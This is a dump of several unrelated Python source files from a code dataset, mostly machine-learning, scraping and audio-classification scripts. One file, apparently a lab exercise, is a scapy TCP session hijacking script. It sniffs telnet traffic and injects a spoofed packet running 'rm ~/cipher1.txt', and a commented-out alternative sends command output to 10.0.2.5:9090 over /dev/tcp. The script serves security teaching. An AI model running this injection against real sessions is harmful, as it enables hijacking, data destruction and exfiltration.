os.listdir(vols_dir) \n if vol.endswith('.vol')]\n \n misses = []\n miscount = 0\n count = 0\n\n for vol_path in vol_paths: \n \n try:\n \n segment_and_export_CHR(vol_path, out_dir, draw)\n \n count += 1\n print('%i done.' 
% count)\n\n except Exception as exc:\n \n miscount += 1\n \n try:\n \n misses.append(vol_path)\n \n except:\n \n pass\n \n print(\"Failed to process %d\" % (miscount))\n print(exc)\n continue\n \n print('Failed segmentations: %i' % miscount)\n print(misses)\n \n return None\n\ndef main():\n \n return None\n \nif __name__ == '__main__':\n \n main()","sub_path":"src/shileyipp/salsatools/choroid.py","file_name":"choroid.py","file_ext":"py","file_size_in_byte":33784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"605937903","text":"#!/usr/bin/python\n\nfrom scapy.all import *\n\n# remove duplication\n# {\"dest ip\":times}\ndest_record = {}\n\n\ndef do_hijack(pkt):\n key = pkt[IP].dst\n if key not in dest_record: # freshman\n dest_record[key] = 0\n return\n else:\n if dest_record[key] < 0: # prior victim\n return\n if dest_record[key] <= 50: # wait for logging\n dest_record[key] += 1\n # print(dest_record[key])\n return\n if 4*pkt[IP].ihl+4*pkt[TCP].dataofs != pkt[IP].len: # exist content\n # print(pkt[IP].ihl, pkt[TCP].dataofs, pkt[IP].len)\n return\n else:\n dest_record[key] = -1 # attack\n\n ip = IP(id=pkt[IP].id+1, src=pkt[IP].src, dst=pkt[IP].dst)\n tcp = TCP(sport=pkt[TCP].sport, dport=pkt[TCP].dport,\n seq=pkt[TCP].seq, ack=pkt[TCP].ack, flags=0x18)\n raw = Raw(load='\\r\\nrm ~/cipher1.txt\\r\\n')\n # raw = Raw(load='\\r\\nls /usr/bin/ > /dev/tcp/10.0.2.5/9090\\r\\n')\n pkt = ip/tcp/raw\n # ls(pkt)\n send(pkt, verbose=0)\n print('attacked', key)\n\n\npkt = sniff(filter='dst port 23', prn=do_hijack)\n","sub_path":"tcp_attacks/task4/hijack.py","file_name":"hijack.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"175080490","text":"#! 
/usr/bin/python\n# -*- coding: utf-8 -*-\nimport os\nimport shutil\n\ndef getFileName(path):\n ''' Get all file names with the given extension in the specified directory '''\n imgpath = os.path.join(path, \"image\")\n xmlpath = os.path.join(path, \"xml\")\n imglist = os.listdir(imgpath)\n xmllist = os.listdir(xmlpath)\n # print f_list\n print(len(imglist))\n print(len(xmllist))\n a = []\n b = []\n c = []\n for i in imglist:\n # os.path.splitext(): split the file name from its extension\n if os.path.splitext(i)[1] == '.bmp':\n a.append(os.path.splitext(i)[0])\n #print(a)\n print(len(a))\n for i in xmllist:\n # os.path.splitext(): split the file name from its extension\n if os.path.splitext(i)[1] == '.xml':\n #print(os.path.splitext(i)[0])\n b.append(os.path.splitext(i)[0])\n elif os.path.splitext(i)[1] != '.xml':\n rpath = os.path.join(xmlpath, i)\n os.remove(rpath)\n print(len(b))\n for k in a:\n if k not in b:\n #print(k)\n filename = str(k) + \".bmp\"\n print(filename)\n revdir = os.path.join(imgpath, filename)\n os.remove(revdir)\n c.append(k)\n print(len(c))\n for m in b:\n if m not in a:\n print(m)\n fname = str(m)+\".xml\"\n rdir = os.path.join(xmlpath,fname)\n os.remove(rdir)\nif __name__ == '__main__':\n path = 'D:/jinkeimg/ng'\n getFileName(path)","sub_path":"difbmporxml.py","file_name":"difbmporxml.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"70725928","text":"import numpy as np\n\nfrom utils import *\nfrom logx import *\nimport torch\nimport torch.nn.functional as F\nfrom copy import deepcopy\nfrom torch.optim import Adam\nimport gym\nimport time\n\nclass NoisyDQN():\n def __init__(\n self, \n env_fn, target_update,\n dqn = NoisyNetwork, seed=0, \n steps_per_epoch=600, \n epochs=100, replay_size=int(1e5), \n gamma=0.99, q_lr=1e-3, \n batch_size=32, start_steps=200, \n update_after=200, num_test_episodes=5, \n max_ep_len=200, logger_kwargs=dict(), \n save_freq=10\n ):\n\n # Instantiate environment\n self.env, self.test_env = env_fn(), env_fn()\n\n # device: cpu / gpu\n self.device = torch.device(\n \"cuda\" if torch.cuda.is_available() else \"cpu\"\n )\n print(self.device)\n\n self.obs_dim = self.env.observation_space.shape[0]\n self.act_dim = self.env.action_space.n\n \n # Create dqn module\n self.dqn = dqn(self.obs_dim, self.act_dim).to(self.device)\n self.dqn_targ = deepcopy(self.dqn)\n # Freeze target networks with respect to optimizers\n for p in self.dqn_targ.parameters():\n p.requires_grad = False\n\n self.seed = seed\n self.steps_per_epoch = steps_per_epoch\n self.epochs = epochs\n self.gamma = gamma\n self.batch_size = batch_size\n self.start_steps = start_steps\n self.update_after = update_after\n self.num_test_episodes = num_test_episodes\n self.max_ep_len = max_ep_len\n self.save_freq = save_freq\n self.target_update = target_update\n\n # Set up logger and save configuration\n self.logger = EpochLogger(**logger_kwargs)\n self.logger.save_config(locals())\n\n # Count variables\n var_counts = tuple(count_vars(module) for module in [self.dqn])\n self.logger.log('\\nNumber of parameters: \\t pi: %d\\n'%var_counts)\n\n self.replay_buffer = OffPolicyBuffer(self.obs_dim, 1, replay_size)\n\n # Set up optimizers for value function\n self.q_optimizer = Adam(self.dqn.parameters(), lr=q_lr)\n\n # Set up model saving\n self.logger.setup_pytorch_saver(self.dqn)\n\n # Set up function for computing Q-loss\n def compute_loss_q(self, data):\n # tensor to cuda\n o, a, o2= data['obs'].to(self.device), data['act'].to(self.device), data['obs2'].to(self.device)\n r, d = 
data['rew'].to(self.device), data['done'].to(self.device)\n q = self.dqn(o).gather(1, a)\n next_q = self.dqn_targ(o2).max(dim=1, keepdim=True)[0].detach()\n target = (r + self.gamma * (1 - d) * next_q).to(self.device)\n\n # calculate dqn loss\n loss_q = F.smooth_l1_loss(q, target)\n\n # Useful info for logging\n loss_info = dict(QVals=q.detach().cpu().numpy())\n\n return loss_q, loss_info\n\n def update(self, data):\n # run one gradient descent step for Q.\n loss_q, loss_info = self.compute_loss_q(data)\n self.q_optimizer.zero_grad()\n loss_q.backward()\n self.q_optimizer.step()\n\n # !!! NoisyNet: reset noise\n self.dqn.reset_noise()\n self.dqn_targ.reset_noise()\n\n # Record things\n self.logger.store(LossQ=loss_q.item(), **loss_info)\n\n def get_action(self, o):\n \"\"\"Select an action from the input state.\"\"\"\n # Use the NoisyNetwork directly \n a = self.dqn(\n torch.FloatTensor(o).to(self.device)\n ).argmax()\n a = a.detach().cpu().numpy()\n \n return a\n \n def test_agent(self):\n \"\"\"Test the agent.\"\"\"\n for _ in range(self.num_test_episodes):\n o, d, ep_ret, ep_len = self.test_env.reset(), False, 0, 0\n while not(d or (ep_len == self.max_ep_len)):\n o, r, d, _ = self.test_env.step(self.get_action(o))\n ep_ret += r\n ep_len += 1\n self.logger.store(TestEpRet=ep_ret, TestEpLen=ep_len)\n \n def target_hard_update(self):\n self.dqn_targ = deepcopy(self.dqn)\n\n def train(self):\n \n # Random seed\n torch.manual_seed(self.seed)\n np.random.seed(self.seed)\n self.env.seed(self.seed)\n \n # Prepare for interaction with environment\n total_steps = self.steps_per_epoch * self.epochs\n start_time = time.time()\n o, ep_ret, ep_len = self.env.reset(), 0, 0\n update_cnt = 0\n\n # Main loop: collect experience in env and update/log each epoch\n for t in range(total_steps):\n \n # Until start_steps have elapsed, randomly sample actions\n # from a uniform distribution for better exploration. Afterwards, \n # use the learned policy. 
\n if t > self.start_steps:\n a = self.get_action(o)\n else:\n a = self.env.action_space.sample()\n\n # Step the env\n o2, r, d, _ = self.env.step(a)\n ep_ret += r\n ep_len += 1\n\n # Ignore the \"done\" signal if it comes from hitting the time\n # horizon (that is, when it's an artificial terminal signal\n # that isn't based on the agent's state)\n d = False if ep_len==self.max_ep_len else d\n\n # Store experience to replay buffer\n self.replay_buffer.store(o, a, r, o2, d)\n\n # Super critical, easy to overlook step: make sure to update \n # most recent observation!\n o = o2\n\n # End of trajectory handling\n if d or (ep_len == self.max_ep_len):\n self.logger.store(EpRet=ep_ret, EpLen=ep_len)\n o, ep_ret, ep_len = self.env.reset(), 0, 0\n\n # Update handling\n if t >= self.update_after:\n batch = self.replay_buffer.sample_batch(self.batch_size)\n self.update(data=batch)\n update_cnt += 1\n \n # if hard update is needed\n if update_cnt % self.target_update == 0:\n self.target_hard_update()\n\n # End of epoch handling\n if (t+1) % self.steps_per_epoch == 0:\n epoch = (t+1) // self.steps_per_epoch\n # Save model\n if (epoch % self.save_freq == 0) or (epoch == self.epochs):\n self.logger.save_state({'env': self.env}, None)\n \n # Test the performance of the deterministic version of the agent.\n self.test_agent()\n # Log info about epoch\n self.logger.log_tabular('Epoch', epoch)\n self.logger.log_tabular('EpRet', with_min_and_max=True)\n self.logger.log_tabular('TestEpRet', with_min_and_max=True)\n self.logger.log_tabular('EpLen', average_only=True)\n self.logger.log_tabular('TestEpLen', average_only=True)\n self.logger.log_tabular('TotalEnvInteracts', t)\n self.logger.log_tabular('QVals', with_min_and_max=True)\n self.logger.log_tabular('LossQ', average_only=True)\n self.logger.log_tabular('Time', time.time()-start_time)\n self.logger.dump_tabular()\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--env', type=str, default='CartPole-v0')\n parser.add_argument('--target_update', type=int, default=100)\n parser.add_argument('--epsilon_decay', type=float, default=1 / 2000)\n parser.add_argument('--gamma', type=float, default=0.99)\n parser.add_argument('--seed', '-s', type=int, default=30)\n parser.add_argument('--epochs', type=int, default=100)\n parser.add_argument('--exp_name', type=str, default='CartPole-v0_dqn_noisy')\n args = parser.parse_args()\n\n from logx import setup_logger_kwargs\n logger_kwargs = setup_logger_kwargs(args.exp_name, args.seed)\n\n agent = NoisyDQN(lambda : gym.make(args.env), target_update=args.target_update, \n dqn=NoisyNetwork, seed=args.seed, logger_kwargs=logger_kwargs,\n epochs=args.epochs, gamma=args.gamma,steps_per_epoch=600, max_ep_len=200)\n agent.train()","sub_path":"rainbow/noisy_dqn.py","file_name":"noisy_dqn.py","file_ext":"py","file_size_in_byte":8227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"359150343","text":"from CRNet import CoordRegressionNetwork\nfrom torch import optim\nfrom torch.autograd import Variable\nimport matplotlib.pyplot as plt\nimport scipy.misc\nimport torch\nimport dsntnn\nimport traf_data\nimport cv2\nimport os\nimport numpy as np\nimport logging\nimport platform\nfrom tensorboardX import SummaryWriter\n\nimage_size = [800, 450]\nif platform.system() =='Windows':\n train_path = \"D:\\Download\\\\traf\"\nelse:\n train_path = \"/home/asprohy/data/traffic\"\n# raccoon_face = 
scipy.misc.imresize(scipy.misc.face()[200:400, 600:800, :], image_size)\n\n# eye_x, eye_y = 24, 26 # label\n#\n# plt.imshow(raccoon_face)\n# plt.scatter([eye_x], [eye_y], color='red', marker='X')\n# plt.show()\n\nlogging.basicConfig(filename='fastrcnnTraf29.log',level=logging.DEBUG)\ntrain_data,_,_ = traf_data.get_data2(train_path)\ndatatype = 'traf'\nmodel_PATH = 'traf_dsntnn29.pt'\n\n# data = train_data\n# img_all = []\n# label_all = []\n# img_label = {}\n# for c in data:\n# img = cv2.imread(os.path.join(train_path, c[0]))\n# h,w = img.shape[:2]\n# img = cv2.resize(img, image_size)\n# label_all.append([int(c[1]/w*image_size[0]), int(c[2]/h*image_size[1])])\n# img = np.array(img)\n# img_tensor = torch.from_numpy(img).permute(2, 0, 1).float()\n# img_label[c[0]]={}\n# img_label[c[0]]['filepath'] = os.path.join(train_path, c[0])\n\nimg_all = []\nlabel_all = []\n# count = 0\n# if datatype == 'traf':\n# for c in train_data:\n# img = cv2.imread(os.path.join(train_path, c['filepath']))\n# h,w = img.shape[:2]\n# img = cv2.resize(img, image_size)\n# img = np.array(img)\n# img_tensor = torch.from_numpy(img).permute(2, 0, 1).float()\n# tmpc = c['bboxes'][0]\n#\n# label_all.append([int((tmpc['x1']+tmpc['x2']) / w * image_size[0]), int((tmpc['y1']+tmpc['y2']) / h * image_size[1])])\n#\n# img_all.append(img_tensor)\n# count += 1\n# else:\n# print('dataLoading is error')\n\n\n#\n# raccoon_face_tensor = img_all.permute(2, 0, 1).float()\n# input_tensor = raccoon_face_tensor.div(255).unsqueeze(0)\n# input_var = Variable(input_tensor, requires_grad=False)\n#\n# eye_coords_tensor = torch.Tensor([label_all])\n# target_tensor = (eye_coords_tensor * 2 + 1) / torch.Tensor(image_size) - 1\n# target_var = Variable(target_tensor, requires_grad=False)\n#\n# print('Target: {:0.4f}, {:0.4f}'.format(*list(target_tensor.squeeze())))\n#\n#\n# model = CoordRegressionNetwork(n_locations=1)\n#\n# coords, heatmaps = model(input_var)\n#\n# print('Initial prediction: {:0.4f}, {:0.4f}'.format(*list(coords.data[0, 0])))\n# plt.imshow(heatmaps[0, 0].data.cpu().numpy())\n# plt.show()\n#\n# optimizer = optim.RMSprop(model.parameters(), lr=2.5e-4)\n# epoch_num = 200\n# for c in epoch_num:\n# # for i in train_data:\n# # Forward pass\n# coords, heatmaps = model(input_var)\n#\n# # Per-location euclidean losses\n# euc_losses = dsntnn.euclidean_losses(coords, target_var)\n# # Per-location regularization losses\n# reg_losses = dsntnn.js_reg_losses(heatmaps, target_var, sigma_t=1.0)\n# # Combine losses into an overall loss\n# loss = dsntnn.average_loss(euc_losses + reg_losses)\n#\n# # Calculate gradients\n# optimizer.zero_grad()\n# loss.backward()\n#\n# # Update model parameters with RMSprop\n# optimizer.step()\n#\n# #single train\n\nimg = cv2.imread(os.path.join(train_path, train_data[0]['filepath']))\nprint(os.path.join(train_path, train_data[0]['filepath']))\nh, w = img.shape[:2]\nprint('h[],w[]', h, w)\nprint('filepath',train_data[0]['filepath'])\n# print(img)\nimg = cv2.resize(img, (image_size[0],image_size[1]))\nimg = np.array(img)\ntmpc = train_data[0]['bboxes'][0]\nprint('lab', tmpc)\nlabel_all = [int((tmpc['x1'] + tmpc['x2'])/2 / w * image_size[0]),int((tmpc['y1'] + tmpc['y2'])/2 / h * image_size[1])]\nprint('lab', label_all)\nraccoon_face_tensor = torch.from_numpy(img).permute(2, 0, 1).float()\ninput_tensor = raccoon_face_tensor.div(255).unsqueeze(0)\ninput_var = input_tensor.cuda()\n\n\nprint(\"label_all:\",label_all)\neye_coords_tensor = torch.Tensor([[label_all]])\ntarget_tensor = (eye_coords_tensor * 2 + 1) / 
torch.Tensor(image_size) - 1\ntarget_var = target_tensor.cuda()\n\nmodel = CoordRegressionNetwork(n_locations=1).cuda()\n\ncoords, heatmaps = model(input_var)\n\nprint('Initial prediction: {:0.4f}, {:0.4f}'.format(*list(coords.data[0, 0])))\nplt.imshow(heatmaps[0, 0].data.cpu().numpy())\nplt.scatter([label_all[0]], [label_all[1]], color='red', marker='X')\nplt.show()\n\noptimizer = optim.RMSprop(model.parameters(), lr=2.5e-4)\nepoch_num = 40\n\nfor i in range(epoch_num):\n count =1\n for c in train_data[:]:\n # Forward pass\n img = cv2.imread(os.path.join(train_path, c['filepath']))\n h, w = img.shape[:2]\n img = cv2.resize(img, (image_size[0],image_size[1]))\n img = np.array(img)\n tmpc = c['bboxes'][0]\n label_all = [int((tmpc['x1'] + tmpc['x2'])/2 / w * image_size[0]),int((tmpc['y1'] + tmpc['y2'])/2 / h * image_size[1])]\n\n raccoon_face_tensor = torch.from_numpy(img).permute(2, 0, 1).float()\n input_tensor = raccoon_face_tensor.div(255).unsqueeze(0)\n input_var = input_tensor.cuda()\n\n\n eye_coords_tensor = torch.Tensor([[label_all]])\n target_tensor = (eye_coords_tensor * 2 + 1) / torch.Tensor(image_size) - 1\n target_var = target_tensor.cuda()\n\n coords, heatmaps = model(input_var)\n\n # Per-location euclidean losses\n euc_losses = dsntnn.euclidean_losses(coords, target_var)\n # Per-location regularization losses\n reg_losses = dsntnn.js_reg_losses(heatmaps, target_var, sigma_t=1.0).cuda()\n # Combine losses into an overall loss\n loss = dsntnn.average_loss(euc_losses + reg_losses).cuda()\n\n # Calculate gradients\n optimizer.zero_grad()\n loss.backward()\n count +=1\n\n if count%200==0:\n print(\"process: \"+str(count)+\" /2000 in epoch: \" +str(i)+str(target_var))\n print(\"loss: \"+str(loss) +\" coords: \"+str(list(coords.data[0, 0])))\n logging.info(\"process: \"+str(count)+\" /2000 in epoch: \" +str(i)+str(target_var))\n\n # Update model parameters with RMSprop\n optimizer.step()\n\n if (i+1)%2 ==0:\n torch.save(model, model_PATH)\n print(\"save model in \"+str(i))\n logging.info(\"save model in \"+str(i))\n\n# Predictions after training\nprint('Predicted coords: {:0.4f}, {:0.4f}'.format(*list(coords.data[0, 0])))\nlogging.info('Predicted coords: {:0.4f}, {:0.4f}'.format(*list(coords.data[0, 0])))\nplt.imshow(heatmaps[0, 0].data.cpu().numpy())\nplt.show()","sub_path":"train_dsntnn.py","file_name":"train_dsntnn.py","file_ext":"py","file_size_in_byte":6553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"437074428","text":"import time\nfrom typing import Generator, Iterable\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom requests_html import HTMLSession\n\nfrom lib import PsaResource, PsaSet\nfrom lib.io import FileWriter\nfrom lib.iter import batch\nfrom lib.psa_card import PsaCard\n\nCardGenerator = Generator[PsaCard, None, None]\n\n\nclass Scraper:\n \n def __init__(self, session: HTMLSession, file_writer: FileWriter):\n self.session = session\n self.file_writer = file_writer\n \n def scrape(self):\n fw = self.file_writer\n cards = get_cards_batched(self.session) \n\n i = 0\n for batch in cards:\n file_name = f\"data/{i:04}.csv\"\n\n fw.open(file_name)\n for card in batch:\n fw.write(card)\n fw.write(\"\\n\")\n fw.close()\n\n i += 1\n\n\ndef endpoint(href):\n BASE_URL = \"https://www.psacard.com\"\n\n return BASE_URL + href\n\n\ndef parse_set(session, href) -> CardGenerator:\n psa_set = PsaSet(session, href)\n print(psa_set)\n\n try:\n time.sleep(0.75)\n yield from psa_set.get_cards()\n except Exception as err:\n 
print(f\"ERROR: Failed to get cards for set {psa_set}\")\n print(err)\n\n\ndef parse_set_group(session, href) -> CardGenerator:\n url = endpoint(href)\n page = requests.get(url)\n soup = BeautifulSoup(page.content, \"html.parser\")\n\n for link in soup.find_all(\"a\"):\n href = link.get(\"href\")\n if \"alltimefinest\" in href:\n url = endpoint(href)\n page = requests.get(url)\n soup = BeautifulSoup(page.content, \"html.parser\")\n\n set_links = []\n\n for row in soup.find_all(\"tr\"):\n links = [l.get(\"href\") for l in row.findChildren(\"a\")]\n has_gallery = any(\"imagegallery\" in l for l in links)\n if has_gallery:\n set_links.append(links[0])\n\n for href in set_links:\n yield from parse_set(session, href)\n\n\ndef parse_category(session, href) -> CardGenerator:\n url = endpoint(href)\n page = requests.get(url)\n soup = BeautifulSoup(page.content, \"html.parser\")\n\n for link in soup.find_all(\"a\"):\n href = link.get(\"href\")\n if PsaResource.is_setlist_endpoint(href):\n yield from parse_set_group(session, href)\n\n\ndef get_cards(session) -> CardGenerator:\n url = endpoint(\"/psasetregistry/baseball/1\")\n\n page = requests.get(url)\n soup = BeautifulSoup(page.content, \"html.parser\")\n\n for link in soup.find_all(\"a\"):\n href = link.get(\"href\")\n if PsaResource.is_setlist_endpoint(href):\n yield from parse_category(session, href)\n\n\ndef get_cards_batched(session, n=100) -> Generator[Iterable[PsaCard], None, None]:\n yield from batch(get_cards(session), n)\n\n","sub_path":"lib/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":2748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"16529761","text":"# -*- coding: UTF-8 -*-\n\nimport json\n\nwith open(\"json1.csv\", \"rt\") as in_file:\n\ttext1 = in_file.read()\n\n# 将字符串转成字典\nuser_dict = json.loads(text1)\n\nwidgetid = user_dict['data']['widgetId']\nprint(widgetid)\n\ndataList = user_dict['data']['data']\n\nfor i in dataList:\n\tprint(i['metricsName'])","sub_path":"case100/35_strDic.py","file_name":"35_strDic.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"629255224","text":"import numpy as np\nimport pandas as pd\nfrom joblib import Parallel, delayed\nfrom calculate_impact_mortality import calculate_impact_mortality\nfrom define_exposures import call_exposures\nfrom multiprocessing import cpu_count\nfrom scipy.sparse import csr_matrix, vstack\n\n\ndef impact_monte_carlo(directory_hazard, scenarios, years_list, n_mc, uncertainty_variables_list=['all'], kanton=None,\n age_group=None, save_median_mat=True):\n \"\"\"Monte Carlo Simulation of the impacts:\n\n Parameters:\n directory_hazard (str): directory to a folder containing one tasmax (and one tasmin) folder with all the\n data files\n scenarios (list): scenarios for which to compute the hazards\n years_list (list): years for which to compute the hazard\n uncertainty_variables_list (list): variables for which to consider the uncertainty. Default: ['all']\n kanton (str or None): Name of canton. Default: None (all of Switzerland)\n age_group (str or None): specific age group, as given in the \"GIS_Data_code\" of the age_categories.csv file. Default: None\n save_median_mat (bool): rather we save the impact matrix . 
Default = True\n\n Returns:\n impacts for each Monte Carlo run, year, scenario, exposure category, optionally impact matrix\n \"\"\"\n\n # the exposures are called outside the loop as there is no uncertainty in this entity.\n print('\\n Starting Exposures generator \\n')\n exposures = call_exposures(kanton=kanton, age_group=age_group)\n print('\\n Ended Exposures generator \\n')\n\n if uncertainty_variables_list != ['all']:\n impact_uncertainty_variable = {} # initiate dictionary for the uncertainty variables, if not 'all'\n for uncertainty_variable in uncertainty_variables_list:\n\n ###########################################################################################################\n # loop over scenarios\n\n impact_scenario = {} # initiate dictionary for the scenarios\n\n if save_median_mat:\n matrices_scenario = {} # if we save the matrices, make dictionary for those\n\n for scenario in scenarios:\n\n ###################################################################################################\n # loop over years\n\n impact_year = {} # for the years\n\n if save_median_mat:\n matrices_year = {} # for the matrices and years\n\n for year in years_list:\n\n #######################################################################################\n # monte carlo calculating the impact for the given scenario, year and variable\n\n ncores_max = cpu_count() # get the number of cores available\n\n impact = Parallel(n_jobs=ncores_max)(delayed(calculate_impact_mortality)(directory_hazard,\n scenario, year, exposures,\n uncertainty_variable=uncertainty_variable,\n kanton=kanton,\n save_median_mat=save_median_mat)\n for i in range(0, n_mc)) # calculate the impact on different cores\n ########################################################################################\n\n impact_year[str(year)] = pd.DataFrame() # pandas dataframe of the impacts for the different exposures\n # and runs\n for e_ in exposures:\n impact_year[str(year)][e_] = np.zeros(n_mc)\n\n if save_median_mat:\n matrices_year[str(year)] = {} # for the matrices, we save them in yet another dictionary as we\n # can't have a pandas dataframe of matrices\n\n for e_ in exposures:\n for i_ in range(0, n_mc):\n impact_year[str(year)][e_][i_] = impact[i_][0][e_] # change the order of the monte carlo\n # output to fit the pandas dataframe\n\n if save_median_mat: # calculate the median for each grid point from the n runs\n # we could also here save the max and min matrix to reproduce some of the plots\n # with the error included\n matrices_year[str(year)][e_] = csr_matrix(np.median(vstack(impact[i_][1][e_]\n for i_ in range(n_mc)).todense(),\n axis=0))\n\n del impact\n impact_scenario[scenario] = impact_year\n\n if save_median_mat:\n matrices_scenario[scenario] = matrices_year\n\n if uncertainty_variable != 'all':\n impact_uncertainty_variable[uncertainty_variable] = impact_scenario\n\n if uncertainty_variable == 'all':\n if not save_median_mat:\n return [impact_scenario] # return only the total loss for each category\n else:\n return [impact_scenario, matrices_scenario] # return the loss and the matrices\n\n else:\n return [impact_uncertainty_variable] # in the case of the sensitivity analysis, the dictionary of the output\n # has an extra level corresponding to the variable 
varied\n","sub_path":"src/impact_calculation/impact_monte_carlo_parallel.py","file_name":"impact_monte_carlo_parallel.py","file_ext":"py","file_size_in_byte":5738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"80782125","text":"import nltk\nimport re\nimport os\nimport numpy as np\n\ndef smooth_count(n_gram, n, total_word_type_num, c_threshold):\n \"\"\"\n convert count to smoothed count\n :param n_gram: un-smoothed n-gram model (contains word pairs and their un-smoothed counts)\n :param c_threshold: threshold for c\n :param n: which kind of n-gram, for example n=2: bigram, n=3: trigram\n :param total_word_type_num: |V|, total number of words in the corpus\n :return: smoothed count in a dictionary (with its word pair)\n \"\"\"\n\n for category in n_gram:\n # see method comment below to check what's returned for get_count_list(n_gram[category])\n unique_pair_count, count = get_count_list(n_gram[category])\n N_c = [0 for x in range(max(unique_pair_count) + 1)]\n c = [0 for x in range(max(unique_pair_count) + 1)]\n for i in range(len(N_c)):\n N_c[i] = unique_pair_count.count(i)\n\n if n == 1:\n # \" For unigrams, you never have c=0 because of using <UNK>, so you can start Good-Turing at c=1\"\n # \" for our unigram our c would start at 2 and we would adjust everything until say a k = 10.\"\n # https://piazza.com/class/is89hasycmjt9?cid=155\n # calculate c* according to N_c\n for j in range(len(N_c)-2):\n i = j + 2\n if i <= c_threshold and N_c[i] != 0:\n c[i] = (i + 1) * N_c[i + 1] / N_c[i]\n elif i <= c_threshold and N_c[i] == 0:\n c[i] = (i + 1) * N_c[i + 1] / (N_c[i] + 1)\n elif i > c_threshold:\n c[i] = i\n elif n > 1:\n # N0 = V^2 -N, where V is total_word_type_num, N is total number of n-gram that has shown up\n N_c[0] = (total_word_type_num ** 2) - count\n # calculate c* according to N_c\n for i in range(len(N_c)):\n if i <= c_threshold and N_c[i] != 0:\n c[i] = (i + 1) * N_c[i + 1] / N_c[i]\n elif i <= c_threshold and N_c[i] == 0:\n c[i] = (i + 1) * N_c[i + 1] / (N_c[i] + 1)\n elif i > c_threshold:\n c[i] = i\n\n #put smoothed count into the n-gram model\n for second_and_after_word, inner_dict in n_gram[category].items():\n for key, value in inner_dict.items():\n n_gram[category][second_and_after_word][key] = c[value]\n\n #print(c[0], N_c[0])\n return n_gram, c[0]\n\ndef get_count_list(ngram):\n \"\"\"\n return count value from n gram in a list, for example\n :param ngram: i.e. 
{'Second...':{'first':1},'Second2...':{'first':1,'se':2},'Second3...':{'first':1}}\n :return: return count = 4 (all ngram pairs) and value = [1,1,2,1]\n \"\"\"\n value = []\n count = 0\n for seoncd_and_after_word, inner_dict in ngram.items():\n for first_word, count in inner_dict.items():\n value.append(count)\n return value, len(value)\n\n# def unigram(dataset):\n# unigram = {}\n# for category in dataset:\n# unigram[category] = {}\n# directory = os.path.join('data_corrected', 'classification task', category, 'train_docs')\n# for file_name in os.listdir(directory):\n# for sentence in read_file(file_name, directory):\n# unigram[category] = unigram_count(sentence, unigram[category])\n#\n# # unigram = {'a':{'0':1,'1':15,'2':2},'b':{'1':19,'2':2}}\n# unigram_prob = unigram_prob_generator(unigram)\n# return unigram_prob\n\nif __name__ == '__main__':\n # dataset = ['atheism', 'autos', 'graphics', 'medicine', 'motorcycles', 'religion', 'space']\n # unigram_prob = unigram(dataset)\n # print()\n sen = 'I eat a apple eat a'\n n = {'topic': {'UNK': {'eat': 2}, 'eat': {'a': 2}, 'a': {'UNK': 1}}}\n uni = {'topic': {'': {'UNK': 2, 'a': 2, 'eat': 3}}}\n smooth_count(n_gram=uni,n=1, total_word_type_num= 1, c_threshold=10)\n","sub_path":"P1/smooth.py","file_name":"smooth.py","file_ext":"py","file_size_in_byte":3905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"647616358","text":"from flask import Flask, jsonify, render_template\nimport pyaudio\nimport wave\nfrom pyAudioAnalysis import audioTrainTest as aT\nimport numpy as np\nimport sys\n \nFORMAT = pyaudio.paInt16\nCHANNELS = 2\nRATE = 44100\nCHUNK = 1024\nRECORD_SECONDS = 10\nWAVE_OUTPUT_FILENAME = \"recording6.wav\"\n \naudio = pyaudio.PyAudio()\n\nframes = []\n\ndef record():\n\t# start Recording\n\tstream = audio.open(format=FORMAT, channels=CHANNELS,\n\t\t rate=RATE, input=True,\n\t\t frames_per_buffer=CHUNK)\n\t# print \"recording...\"\n\tfor i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):\n\t data = stream.read(CHUNK)\n\t frames.append(data)\n\t# print \"finished recording\"\n\t# stop Recording\n\tstream.stop_stream()\n\tstream.close()\n\taudio.terminate()\n\treturn 'recorded'\n\ndef save(output_name):\n\twaveFile = wave.open(output_name, 'wb')\n\twaveFile.setnchannels(CHANNELS)\n\twaveFile.setsampwidth(audio.get_sample_size(FORMAT))\n\twaveFile.setframerate(RATE)\n\twaveFile.writeframes(b''.join(frames))\n\twaveFile.close()\n\ndef classify(filename):\n\tisSignificant = 0.8 #TN/FP Threshold\n\n\t# Result, P, classNames = aT.fileClassification(filename, \"knnDE\",\"knn\")\n\tResult, P, classNames = aT.fileClassification(filename, \"knnDE2\",\"knn\")\n\twinner = np.argmax(P) #pick the result with the highest probability value.\n\tans = {}\n\tif P[winner] > isSignificant :\n\t \t# print(\"File: \" + filename + \" is in category: \" + classNames[winner] + \", with probability: \" + str(P[winner]))\n\t \t# ans += \"File: \" + filename + \" is in category: \" + classNames[winner] + \", with probability: \" + str(P[winner])\n\t \tans = {\"class\": classNames[winner], \"prob\":P[winner]}\n\telse :\n\t # print(\"Can't classify sound: \" + str(P))\n\t \tans = {\"class\": \"none detected\"}\n\n\treturn ans\n\n\n\napp = Flask(__name__)\n\n@app.route('/')\ndef hello_world():\n\t# record()\n\t# save(WAVE_OUTPUT_FILENAME)\n\t# ans = classify(WAVE_OUTPUT_FILENAME)\n # \treturn \"Hello, World!\\n\" + ans['class']\n \treturn render_template('index.html')\n\n# @app.route('/api/get_messages/', methods = 
